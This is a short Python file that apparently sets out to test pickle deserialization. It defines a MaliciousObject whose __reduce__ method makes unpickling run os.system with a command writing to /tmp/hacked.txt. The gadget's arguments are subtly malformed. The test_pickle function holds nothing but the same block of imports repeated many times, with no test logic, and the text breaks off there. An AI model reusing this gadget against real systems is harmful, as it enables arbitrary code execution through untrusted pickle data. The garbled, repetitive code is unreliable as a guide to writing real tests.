import pickle
import os

def malicious_object():
    import os
    class MaliciousObject:
        def __reduce__(self):
            return os.system, 'echo "Hacked!" > /tmp/hacked.txt'
    return MaliciousObject()

def test_pickle():
    import pickle
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile
    import os
    import tempfile
    import shutil
    import subprocess
    import sys
    import time
    import tempfile